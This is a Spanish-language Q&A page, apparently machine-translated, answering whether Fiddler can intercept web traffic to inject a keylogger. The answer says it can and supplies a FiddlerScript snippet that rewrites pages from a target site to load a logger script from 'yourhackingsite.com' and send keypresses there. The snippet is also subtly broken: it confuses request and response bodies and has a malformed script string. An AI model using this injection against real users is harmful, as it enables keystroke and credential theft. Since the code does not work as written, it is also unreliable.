¿Podemos interceptar el tráfico web utilizando Fiddler e inyectar una funcionalidad como el registrador de claves antes de que se realice la solicitud al servidor?
¿Podemos interceptar el tráfico web utilizando Fiddler e inyectar una funcionalidad como el registrador de claves antes de que se realice la solicitud al servidor?
Sí, puedes hacer esto.
En primer lugar, debe agregar la extensión fiddler llamada secuencia de comandos de Fiddler . Esto le permite manejar eventos de Fiddler como OnBeforeRequest, OnBeforeResponse, etc.
Dado que necesita interceptar el tráfico a pedido, debe interceptar el evento OnBeforeRequest.
A continuación se muestra un código de ejemplo que puede utilizar para lograrlo utilizando el script fiddler. Tenga en cuenta que no podrá lograr exactamente lo que necesita de esta secuencia de comandos, pero úsela como inicio y modifíquela según sus necesidades.
if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{
oSession.utilDecodeResponse();
var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here
var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';logger+='<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';
body = body.replace("<head>",logger + "</head>");
oSession.utilDecodeResponseBody(body); // inject your custom altered body
}
Lea otras preguntas en las etiquetas keyloggers ssl-interception